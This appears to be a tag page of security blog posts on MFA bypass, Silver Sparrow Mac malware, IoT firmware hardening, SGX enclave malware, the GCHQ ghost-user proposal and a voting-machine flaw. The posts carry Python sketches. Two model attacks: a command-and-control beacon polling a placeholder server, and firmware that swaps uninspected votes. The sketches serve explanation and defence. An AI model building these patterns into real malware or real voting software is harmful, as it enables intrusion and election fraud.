Entries Tagged "computer security"

Bypassing Two-Factor Authentication

These techniques are not new, but they’re increasingly popular:

…some forms of MFA are stronger than others, and recent events show that these weaker forms aren’t much of a hurdle for some hackers to clear. In the past few months, suspected script kiddies like the Lapsus$ data extortion gang and elite Russian-state threat actors (like Cozy Bear, the group behind the SolarWinds hack) have both successfully defeated the protection.

[…]

Methods include:

  • Sending a bunch of MFA requests and hoping the target finally accepts one to make the noise stop.
  • Sending one or two prompts per day. This method often attracts less attention, but “there is still a good chance the target will accept the MFA request.”
  • Calling the target, pretending to be part of the company, and telling the target they need to send an MFA request as part of a company process.
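
These prompt-bombing patterns are also visible from the defender's side. As a rough illustration (not any vendor's actual detection logic; the threshold and window are invented), here is a minimal Python sketch that flags an account whose push prompts are being rejected in a burst:

```python
from collections import defaultdict, deque
import time

WINDOW_SECONDS = 600   # hypothetical: look at the last 10 minutes
MAX_REJECTED = 3       # hypothetical: alert after 3 rejected prompts

_rejections = defaultdict(deque)   # username -> timestamps of rejected prompts

def record_mfa_result(username, accepted, now=None):
    """Record one push-MFA result; return True if prompt bombing is suspected."""
    now = time.time() if now is None else now
    if accepted:
        return False
    events = _rejections[username]
    events.append(now)
    while events and now - events[0] > WINDOW_SECONDS:   # expire old events
        events.popleft()
    return len(events) >= MAX_REJECTED   # a burst of rejections looks like bombing

# Three rejected prompts within ten seconds should trigger the alert.
for t in (0.0, 5.0, 9.0):
    suspicious = record_mfa_result("alice", accepted=False, now=1000.0 + t)
print("suspect prompt bombing:", suspicious)   # True
```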

FIDO2 multi-factor authentication systems are not susceptible to these attacks, because the authentication is cryptographically bound to the physical device and to the legitimate site it was registered with.
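
Concretely, a WebAuthn/FIDO2 assertion signs over both a server-issued challenge and the origin the browser actually saw, so an assertion relayed through a look-alike phishing site fails verification. A minimal sketch of that server-side check (an HMAC stands in for the authenticator's real per-site ECDSA keypair, and all names here are hypothetical):

```python
import hashlib, hmac, json, secrets

EXPECTED_ORIGIN = "https://example.com"   # hypothetical relying party

# Stand-in for the authenticator's per-site key. Real FIDO2 uses an ECDSA
# keypair and the server verifies with the public half; a shared HMAC key
# keeps this sketch dependency-free.
DEVICE_KEY = secrets.token_bytes(32)

def authenticator_sign(origin, challenge):
    """What the browser and authenticator produce: signed data naming the origin."""
    client_data = json.dumps({"origin": origin, "challenge": challenge}).encode()
    sig = hmac.new(DEVICE_KEY, client_data, hashlib.sha256).digest()
    return client_data, sig

def server_verify(client_data, sig, issued_challenge):
    expected = hmac.new(DEVICE_KEY, client_data, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return False
    data = json.loads(client_data)
    # The origin is inside the signed blob, so a phishing site can't forge it.
    return data["origin"] == EXPECTED_ORIGIN and data["challenge"] == issued_challenge

challenge = secrets.token_hex(16)
print(server_verify(*authenticator_sign("https://example.com", challenge), challenge))  # True
print(server_verify(*authenticator_sign("https://examp1e.com", challenge), challenge))  # False
```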

And even though there are attacks against these two-factor systems, they’re much more secure than not having them at all. If nothing else, they block pretty much all automated attacks.

Posted on April 1, 2022 at 6:12 AM

Mysterious Macintosh Malware

This is weird:

Once an hour, infected Macs check a control server to see if there are any new commands the malware should run or binaries to execute. So far, however, researchers have yet to observe delivery of any payload on any of the 30,000 infected machines, leaving the malware’s ultimate goal unknown. The lack of a final payload suggests that the malware may spring into action once an unknown condition is met.
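
The check-in behavior described here is ordinary beaconing, structurally the same loop an auto-updater uses. A deliberately simplified sketch of the pattern (the URL, response format, and dispatch are invented; Silver Sparrow's actual implementation differs):

```python
import time
import urllib.request

C2_URL = "https://c2.example.invalid/agent"   # hypothetical, not the real infrastructure

def run(command):
    print("would execute:", command)          # stub dispatch for the sketch

def beacon_once():
    # Ask the control server whether there is anything new to run.
    with urllib.request.urlopen(C2_URL, timeout=30) as resp:
        command = resp.read().decode().strip()
    if command:              # in the observed infections, nothing ever arrived
        run(command)

while True:
    try:
        beacon_once()
    except OSError:          # server unreachable; try again next cycle
        pass
    time.sleep(3600)         # once an hour, as in the report
```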

Also curious, the malware comes with a mechanism to completely remove itself, a capability that’s typically reserved for high-stealth operations. So far, though, there are no signs the self-destruct feature has been used, raising the question of why the mechanism exists.

Besides those questions, the malware is notable for a version that runs natively on the M1 chip that Apple introduced in November, making it only the second known piece of macOS malware to do so. The malicious binary is more mysterious still because it uses the macOS Installer JavaScript API to execute commands. That makes it hard to analyze installation package contents or the way that package uses the JavaScript commands.

The malware has been found in 153 countries with detections concentrated in the US, UK, Canada, France, and Germany. Its use of Amazon Web Services and the Akamai content delivery network ensures the command infrastructure works reliably and also makes blocking the servers harder. Researchers from Red Canary, the security firm that discovered the malware, are calling the malware Silver Sparrow.

Feels government-designed, rather than criminal or hacker.

Another article. And the Red Canary analysis.

Posted on March 2, 2021 at 6:05 AM

Mapping Security and Privacy Research across the Decades

This is really interesting: “A Data-Driven Reflection on 36 Years of Security and Privacy Research,” by Aniqua Baset and Tamara Denning:

Abstract: Meta-research—research about research—allows us, as a community, to examine trends in our research and make informed decisions regarding the course of our future research activities. Additionally, overviews of past research are particularly useful for researchers or conferences new to the field. In this work we use topic modeling to identify topics within the field of security and privacy research using the publications of the IEEE Symposium on Security & Privacy (1980-2015), the ACM Conference on Computer and Communications Security (1993-2015), the USENIX Security Symposium (1993-2015), and the Network and Distributed System Security Symposium (1997-2015). We analyze and present the data from the perspective of topic trends and authorship. We believe our work serves to contextualize the academic field of computer security and privacy research via one of the first data-driven analyses. An interactive visualization of the topics and corresponding publications is available at https://secprivmeta.net.

I like seeing how our field has morphed over the years.
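
Topic modeling is also easy to try at toy scale. A minimal sketch using scikit-learn's LDA on a handful of stand-in "abstracts" (the paper's corpus, preprocessing, and model parameters are of course far more extensive):

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation

# Stand-in documents; the paper fits topics over decades of S&P, CCS,
# USENIX Security, and NDSS publications.
docs = [
    "buffer overflow exploit mitigation stack memory corruption",
    "tls certificate handshake encryption key exchange",
    "user study privacy consent mobile app permissions",
    "malware botnet command and control detection",
    "anonymity tor traffic analysis deanonymization",
    "return oriented programming code reuse defenses",
]

vec = CountVectorizer(stop_words="english")
counts = vec.fit_transform(docs)
lda = LatentDirichletAllocation(n_components=3, random_state=0).fit(counts)

terms = vec.get_feature_names_out()
for i, weights in enumerate(lda.components_):
    top = terms[weights.argsort()[::-1][:4]]   # four highest-weight words per topic
    print(f"topic {i}:", " ".join(top))
```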

Posted on October 24, 2019 at 6:21 AM

Measuring the Security of IoT Devices

In August, CyberITL completed a large-scale survey of software security practices in the IoT environment by looking at the compiled software.

Data Collected:

  • 22 Vendors
  • 1,294 Products
  • 4,956 Firmware versions
  • 3,333,411 Binaries analyzed
  • Date range of data: 2003-03-24 to 2019-01-24 (varies by vendor, most up to 2018 releases)

[…]

This dataset contains products such as home routers, enterprise equipment, smart cameras, security devices, and more. It represents a wide range of devices found in home, enterprise, and government deployments.

Vendors include Asus, Belkin, DLink, Linksys, Moxa, Tenda, Trendnet, and Ubiquiti.

CyberITL’s methodology is not source code analysis. They look at the actual firmware. And they don’t look for vulnerabilities; they look for secure coding practices that indicate that the company is taking security seriously, and whose lack pretty much guarantees that there will be vulnerabilities. These include address space layout randomization and stack guards.
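
Checks like these are straightforward to reproduce on a single binary. Here is a minimal sketch (assuming pyelftools is installed; CITL's pipeline does this at scale across unpacked firmware images) that tests an ELF file for PIE, which makes ASLR effective for the executable, plus stack canaries and RELRO:

```python
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection

def hardening_report(path):
    with open(path, "rb") as f:
        elf = ELFFile(f)
        # PIE executables are ET_DYN, so the loader can place them anywhere.
        pie = elf.header["e_type"] == "ET_DYN"
        # Stack-protector builds reference __stack_chk_fail.
        canary = any(
            sym.name == "__stack_chk_fail"
            for sec in elf.iter_sections()
            if isinstance(sec, SymbolTableSection)
            for sym in sec.iter_symbols()
        )
        # Read-only relocations show up as a PT_GNU_RELRO segment.
        relro = any(seg["p_type"] == "PT_GNU_RELRO" for seg in elf.iter_segments())
    return {"pie": pie, "stack_canary": canary, "relro": relro}

print(hardening_report("/bin/ls"))   # e.g. {'pie': True, 'stack_canary': True, 'relro': True}
```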

A summary of their results.

CITL identified a number of important takeaways from this study:

  • On average, updates were more likely to remove hardening features than add them.
  • Within our 15-year data set, there have been no positive trends from any one vendor.
  • MIPS is both the most common CPU architecture and least hardened on average.
  • There are a large number of duplicate binaries across multiple vendors, indicating a common build system or toolchain.

Their website contains the raw data.

Posted on October 3, 2019 at 6:28 AM

Attacking the Intel Secure Enclave

Interesting paper by Michael Schwarz, Samuel Weiser, and Daniel Gruss. The upshot is that both Intel and AMD have assumed that trusted enclaves will run only trustworthy code. Of course, that’s not true. And there are no security mechanisms that can deal with malicious enclaves, because the designers couldn’t imagine that they would be necessary. The results are predictable.

The paper: “Practical Enclave Malware with Intel SGX.”

Abstract: Modern CPU architectures offer strong isolation guarantees towards user applications in the form of enclaves. For instance, Intel’s threat model for SGX assumes fully trusted enclaves, yet there is an ongoing debate on whether this threat model is realistic. In particular, it is unclear to what extent enclave malware could harm a system. In this work, we practically demonstrate the first enclave malware which fully and stealthily impersonates its host application. Together with poorly-deployed application isolation on personal computers, such malware can not only steal or encrypt documents for extortion, but also act on the user’s behalf, e.g., sending phishing emails or mounting denial-of-service attacks. Our SGX-ROP attack uses a new TSX-based memory-disclosure primitive and a write-anything-anywhere primitive to construct a code-reuse attack from within an enclave which is then inadvertently executed by the host application. With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer. We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits. With our results, we seek to demystify the enclave malware threat and lay solid ground for future research on and defense against enclave malware.

Posted on August 30, 2019 at 6:18 AM

Evaluating the GCHQ Exceptional Access Proposal

The so-called Crypto Wars have been going on for 25 years now. Basically, the FBI—and some of their peer agencies in the UK, Australia, and elsewhere—argue that the pervasive use of civilian encryption is hampering their ability to solve crimes and that they need the tech companies to make their systems susceptible to government eavesdropping. Sometimes their complaint is about communications systems, like voice or messaging apps. Sometimes it’s about end-user devices. On the other side of this debate is pretty much all technologists working in computer security and cryptography, who argue that adding eavesdropping features fundamentally makes those systems less secure.

A recent entry in this debate is a proposal by Ian Levy and Crispin Robinson, both from the UK’s GCHQ (the British signals-intelligence agency—basically, its NSA). It’s actually a positive contribution to the discourse around backdoors; most of the time government officials broadly demand that the tech companies figure out a way to meet their requirements, without providing any details. Levy and Robinson write:

In a world of encrypted services, a potential solution could be to go back a few decades. It’s relatively easy for a service provider to silently add a law enforcement participant to a group chat or call. The service provider usually controls the identity system and so really decides who’s who and which devices are involved—they’re usually involved in introducing the parties to a chat or call. You end up with everything still being end-to-end encrypted, but there’s an extra ‘end’ on this particular communication. This sort of solution seems to be no more intrusive than the virtual crocodile clips that our democratically elected representatives and judiciary authorise today in traditional voice intercept solutions and certainly doesn’t give any government power they shouldn’t have.

On the surface, this isn’t a big ask. It doesn’t affect the encryption that protects the communications. It only affects the authentication that assures people they are talking to whom they think they are. But it’s no less dangerous a backdoor than any others that have been proposed: It exploits a security vulnerability rather than fixing it, and it opens all users of the system to exploitation of that same vulnerability by others.

In a blog post, cryptographer Matthew Green summarized the technical problems with this GCHQ proposal. Basically, making this backdoor work requires not only changing the cloud computers that oversee communications, but it also means changing the client program on everyone’s phone and computer. And that change makes all of those systems less secure. Levy and Robinson make a big deal of the fact that their backdoor would only be targeted against specific individuals and their communications, but it’s still a general backdoor that could be used against anybody.

The basic problem is that a backdoor is a technical capability—a vulnerability—that is available to anyone who knows about it and has access to it. Surrounding that vulnerability is a procedural system that tries to limit access to that capability. Computers, especially internet-connected computers, are inherently hackable, limiting the effectiveness of any procedures. The best defense is to not have the vulnerability at all.

That old physical eavesdropping system Levy and Robinson allude to also exploits a security vulnerability. Because telephone conversations were unencrypted as they passed through the physical wires of the phone system, the police were able to go to a switch in a phone company facility or a junction box on the street and manually attach alligator clips to a specific pair and listen in to what that phone transmitted and received. It was a vulnerability that anyone could exploit—not just the police—but was mitigated by the fact that the phone company was a monolithic monopoly, and physical access to the wires was either difficult (inside a phone company building) or obvious (on the street at a junction box).

The functional equivalent of physical eavesdropping for modern computer phone switches is a requirement of a 1994 U.S. law called CALEA—and similar laws in other countries. By law, telephone companies must engineer phone switches that the government can eavesdrop on, mirroring that old physical system with computers. It is not the same thing, though. It doesn’t have those same physical limitations that make it more secure. It can be administered remotely. And it’s implemented by a computer, which makes it vulnerable to the same hacking that every other computer is vulnerable to.

This isn’t a theoretical problem; these systems have been subverted. The most public incident dates from 2004 in Greece. Vodafone Greece had phone switches with the kind of lawful-intercept eavesdropping capability that CALEA mandates. It was turned off by default in the Greek phone system, but the NSA managed to surreptitiously turn it on and use it to eavesdrop on the Greek prime minister and over 100 other high-ranking dignitaries.

There’s nothing distinct about a phone switch that makes it any different from other modern encrypted voice or chat systems; any remotely administered backdoor system will be just as vulnerable. Imagine that a chat program added this GCHQ backdoor. It would have to add a feature that added additional parties to a chat from somewhere in the system—and not by the people at the endpoints. It would have to suppress any messages alerting users to another party being added to that chat. Since some chat programs, like iMessage and Signal, automatically send such messages, it would force those systems to lie to their users. Other systems would simply never implement the “tell me who is in this chat conversation” feature, which amounts to the same thing.
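
To make the mechanics concrete, here is a toy model (using PyNaCl; it resembles no real messaging protocol) in which the server owns the membership list, so the sender's "end-to-end" encryption quietly fans out to the ghost as well:

```python
from nacl.public import PrivateKey, SealedBox   # assumes PyNaCl is installed

class ToyServer:
    """Controls the identity system, i.e., decides who is 'in' the chat."""
    def __init__(self):
        self.members = {}   # name -> public key

    def add_member(self, name, public_key, announce=True):
        self.members[name] = public_key
        if announce:
            print(f"[chat] {name} joined")   # the proposal requires suppressing this

def send(server, plaintext):
    # The sender encrypts one copy per member on the server-supplied list.
    return {name: SealedBox(pk).encrypt(plaintext)
            for name, pk in server.members.items()}

alice, bob, ghost = PrivateKey.generate(), PrivateKey.generate(), PrivateKey.generate()
server = ToyServer()
server.add_member("alice", alice.public_key)
server.add_member("bob", bob.public_key)
server.add_member("ghost", ghost.public_key, announce=False)   # silently added

ciphertexts = send(server, b"meet at noon")
print(SealedBox(ghost).decrypt(ciphertexts["ghost"]))   # b'meet at noon'
```

Note that the encryption itself is never broken; the compromise lives entirely in the identity and notification layer, which is exactly why Levy and Robinson can say everything stays "end-to-end encrypted."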

And once that’s in place, every government will try to hack it for its own purposes—just as the NSA hacked Vodafone Greece. Again, this is nothing new. In 2010, China successfully hacked the backdoor mechanism Google put in place to meet law-enforcement requests. In 2015, someone—we don’t know who—hacked an NSA backdoor in a random-number generator used to create encryption keys, changing the parameters so they could also eavesdrop on the communications. There are certainly other stories that haven’t been made public.

Simply adding the feature erodes public trust. If you were a dissident in a totalitarian country trying to communicate securely, would you want to use a voice or messaging system that is known to have this sort of backdoor? Who would you bet on, especially when the cost of losing the bet might be imprisonment or worse: the company that runs the system, or your country’s government intelligence agency? If you were a senior government official, or the head of a large multinational corporation, or the security manager or a critical technician at a power plant, would you want to use this system?

Of course not.

Two years ago, there was a rumor of a WhatsApp backdoor. The details are complicated, and calling it a backdoor or a vulnerability is largely inaccurate—but the resultant confusion caused some people to abandon the encrypted messaging service.

Trust is fragile, and transparency is essential to trust. And while Levy and Robinson state that “any exceptional access solution should not fundamentally change the trust relationship between a service provider and its users,” this proposal does exactly that. Communications companies could no longer be honest about what their systems were doing, and we would have no reason to trust them if they tried.

In the end, all of these exceptional access mechanisms, whether they exploit existing vulnerabilities that should be closed or force vendors to open new ones, reduce the security of the underlying system. They shift our reliance from security technologies we know how to do well—cryptography—to computer security technologies we are much less good at. Even worse, they replace technical security measures with organizational procedures. Whether it’s a database of master keys that could decrypt an iPhone or a communications switch that orchestrates who is securely chatting with whom, it is vulnerable to attack. And it will be attacked.

The foregoing discussion is a specific example of a broader discussion that we need to have, and it’s about the attack/defense balance. Which should we prioritize? Should we design our systems to be open to attack, in which case they can be exploited by law enforcement—and others? Or should we design our systems to be as secure as possible, which means they will be better protected from hackers, criminals, foreign governments and—unavoidably—law enforcement as well?

This discussion is larger than the FBI’s ability to solve crimes or the NSA’s ability to spy. We know that foreign intelligence services are targeting the communications of our elected officials, our power infrastructure, and our voting systems. Do we really want some foreign country penetrating our lawful-access backdoor in the same way the NSA penetrated Greece’s?

I have long maintained that we need to adopt a defense-dominant strategy: We should prioritize our need for security over our need for surveillance. This is especially true in the new world of physically capable computers. Yes, it will mean that law enforcement will have a harder time eavesdropping on communications and unlocking computing devices. But law enforcement has other forensic techniques to collect surveillance data in our highly networked world. We’d be much better off increasing law enforcement’s technical ability to investigate crimes in the modern digital world than we would be by weakening security for everyone. The ability to surreptitiously add ghost users to a conversation is a vulnerability, and it’s one that we would be better served by closing than exploiting.

This essay originally appeared on Lawfare.com.

EDITED TO ADD (1/30): More commentary.

Posted on January 18, 2019 at 5:54 AM

Security Vulnerability in ESS ExpressVote Touchscreen Voting Computer

Of course the ESS ExpressVote voting computer will have lots of security vulnerabilities. It’s a computer, and computers have lots of vulnerabilities. This particular vulnerability is particularly interesting because it’s the result of a security mistake in the design process. Someone didn’t think the security through, and the result is a voter-verifiable paper audit trail that doesn’t provide the security it promises.

Here are the details:

Now there’s an even worse option than “DRE with paper trail”; I call it the “press this button if it’s OK for the machine to cheat” option. The country’s biggest vendor of voting machines, ES&S, has a line of voting machines called ExpressVote. Some of these are optical scanners (which are fine), and others are “combination” machines, basically a ballot-marking device and an optical scanner all rolled into one.

This video shows a demonstration of ExpressVote all-in-one touchscreens purchased by Johnson County, Kansas. The voter brings a blank ballot to the machine, inserts it into a slot, chooses candidates. Then the machine prints those choices onto the blank ballot and spits it out for the voter to inspect. If the voter is satisfied, she inserts it back into the slot, where it is counted (and dropped into a sealed ballot box for possible recount or audit).

So far this seems OK, except that the process is a bit cumbersome and not completely intuitive (watch the video for yourself). It still suffers from the problems I describe above: voters may not carefully review all the choices, especially in down-ballot races; and counties need to buy a lot more voting machines, because voters occupy the machine for a long time (in contrast to op-scan ballots, where they occupy a cheap cardboard privacy screen).

But here’s the amazingly bad feature: “The version that we have has an option for both ways,” [Johnson County Election Commissioner Ronnie] Metsker said. “We instruct the voters to print their ballots so that they can review their paper ballots, but they’re not required to do so. If they want to press the button ‘cast ballot,’ it will cast the ballot, but if they do so they are doing so with full knowledge that they will not see their ballot card, it will instead be cast, scanned, tabulated and dropped in the secure ballot container at the backside of the machine.” [TYT Investigates, article by Jennifer Cohn, September 6, 2018]

Now it’s easy for a hacked machine to cheat undetectably! All the fraudulent vote-counting program has to do is wait until the voter chooses between “cast ballot without inspecting” and “inspect ballot before casting.” If the latter, then don’t cheat on this ballot. If the former, then change votes however it likes, and print those fraudulent votes on the paper ballot, knowing that the voter has already given up the right to look at it.
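
Appel's observation reduces to a few lines of logic. Here is a hypothetical sketch of the dishonest firmware's decision point, which is exactly why the "cast without inspecting" button is so dangerous:

```python
def finalize_ballot(choices, voter_will_inspect):
    """What hacked firmware could do at the moment the voter picks a button."""
    if voter_will_inspect:
        printed = dict(choices)        # behave honestly: this paper will be checked
    else:
        printed = swap_votes(choices)  # cheat: no one will ever look at this paper
    print_on_ballot(printed)
    tabulate(printed)

def swap_votes(choices):
    # Hypothetical: flip one down-ballot race the attacker cares about.
    flipped = dict(choices)
    flipped["county_commissioner"] = "attacker's preferred candidate"
    return flipped

def print_on_ballot(printed):
    pass   # stub standing in for the machine's printer

def tabulate(printed):
    pass   # stub standing in for the machine's tally
```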

A voter-verifiable paper audit trail does not require every voter to verify the paper ballot. But it does require that every voter be able to verify the paper ballot. I am continuously amazed by how bad electronic voting machines are. Yes, they’re computers. But they also seem to be designed by people who don’t understand computer (or any) security.

Posted on September 20, 2018 at 6:45 AM
